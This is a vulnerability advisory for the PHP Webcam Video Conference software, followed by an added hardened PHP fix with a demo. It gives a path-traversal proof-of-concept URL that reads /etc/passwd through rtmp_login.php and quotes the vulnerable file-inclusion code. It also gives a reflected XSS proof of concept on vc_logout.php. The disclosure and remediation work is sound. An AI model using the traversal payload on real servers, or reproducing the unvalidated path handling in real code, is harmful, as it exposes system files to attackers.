PHP Webcam Video Conference Local File Inclusion / XSS

2014-02-06T00:00:00
ID PACKETSTORM:125088
Type packetstorm
Reporter vinicius777
Modified 2014-02-06T00:00:00

Description

                                        
`# Exploit: PHP Webcam Video Conference - LFI/XSS  
# Date: 06/02/2014  
# Exploit Author: vinicius777  
# Contact: vinicius777 [AT] gmail / @vinicius777_  
# Vendor Homepage: http://www.videowhisper.com/  
# Software Link: http://sourceforge.net/projects/phpwebcamvideoconference  
# Solution: Upgrade to the new version on the VideoWhisper vendor homepage.  
  
[1] Local File Include - rtmp_login.php  
  
P0C: http://192.168.1.7/vc_php/rtmp_login.php?s=../../../../../etc/passwd  
  
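[+] rtmp_login.php  
  
<?php  
// "s" is taken straight from the query string with no validation  
$session = $_GET['s'];  
  
// User input is concatenated into the path, so "../" sequences escape uploads/_sessions/  
$filename1 = "uploads/_sessions/$session";  
if (file_exists($filename1))  
{  
    // The contents of whatever file the path resolves to are echoed to the client  
    echo implode('', file($filename1));  
}  
else  
{  
    echo "VideoWhisper=1&login=0";  
}  
?>  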
  
  
[2] Reflected XSS - vc_logout.php  
  
P0C: http://192.168.1.7/vc_php/vc_logout.php?message=[XSS]  
  
`
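
A hardened counterpart to the `rtmp_login.php` snippet and the `message` parameter described above, as an added example that is not code from the advisory or from VideoWhisper. The function names, the session-token format and the HTML output context for `message` are assumptions; the demo directory and inputs at the bottom are constructed.

```php
<?php
// Added example (not VideoWhisper code). Names and the token format are assumptions.

/** Map the "s" parameter to a file inside $baseDir, or return null. */
function resolve_session_file(string $session, string $baseDir): ?string
{
    // Allow-list: a session name is a short token, never a path (assumed format).
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $session)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $session);   // false when the file is missing
    if ($base === false || $path === false) {
        return null;
    }
    // Defence in depth: after symlink resolution the file must still sit under
    // the session directory and be a regular file.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0 || !is_file($path)) {
        return null;
    }
    return $path;
}

/** Encode the "message" parameter for an HTML text or attribute context. */
function render_message(string $message): string
{
    return htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// --- Constructed demo: a temporary session directory holding one session file ---
$dir = sys_get_temp_dir() . '/vw_sessions_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
file_put_contents("$dir/alice_1", 'VideoWhisper=1&login=1');

// Valid token, the traversal string from the advisory, and a missing session.
foreach (['alice_1', '../../../../../etc/passwd', 'missing'] as $s) {
    $file = resolve_session_file($s, $dir);
    $body = $file !== null ? file_get_contents($file) : 'VideoWhisper=1&login=0';
    printf("%-28s => %s\n", $s, $body);
}

// Markup in "message" is emitted as inert text instead of being reflected raw.
echo render_message('<i>logged out</i> "bye"'), "\n";

unlink("$dir/alice_1");
rmdir($dir);
```

Rejected input gets the same `VideoWhisper=1&login=0` response as a missing session, so the endpoint does not reveal whether a path outside the session directory exists.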